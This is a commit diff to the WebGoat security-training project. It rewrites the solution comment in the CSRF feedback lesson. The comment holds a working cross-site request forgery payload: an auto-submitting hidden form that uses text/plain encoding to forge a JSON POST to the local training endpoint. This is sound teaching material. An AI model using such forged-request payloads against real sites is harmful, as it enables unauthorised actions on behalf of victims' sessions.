docs(CSRFFeedback.java): fixed one invalid solution about CSRF attack (#2010)

Co-authored-by: HackHuang <GoogTech@outlook.com> Co-authored-by: HackHuang <hi@goog.tech>
2025-01-26 20:23:40 +01:00 · 2025-01-26 20:23:40 +01:00 · 9c90a24cc0
commit 9c90a24cc0
parent 2ac50bfbd8
1 changed files with 8 additions and 5 deletions
--- a/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFFeedback.java
+++ b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFFeedback.java
@ -115,10 +115,13 @@ public class CSRFFeedback implements AssignmentEndpoint {
    return false;
  }

-  /**
-   * Solution <form name="attack" enctype="text/plain"
-   * action="http://localhost:8080/WebGoat/csrf/feedback/message" METHOD="POST"> <input
-   * type="hidden" name='{"name": "Test", "email": "test1233@dfssdf.de", "subject": "service",
-   * "message":"dsaffd"}'> </form> <script>document.attack.submit();</script>
+  /*
+   * Solution:
+   * <form name="attack" enctype="text/plain" action="http://localhost:8080/WebGoat/csrf/feedback/message" METHOD="POST">
+   *    <!-- Construct valid JSON data: {name: "HackHuang", email: "email@example.com", subject: "suggestions", message: "Fixed the invalid solution="} -->
+   *    <input type="hidden" name='{"name": "HackHuang", "email": "email@example.com", "subject": "suggestions","message":"Fixed the invalid solution', value='"}'>
+   * </form>
+   * <script>document.attack.submit();</script>
   */
+
 }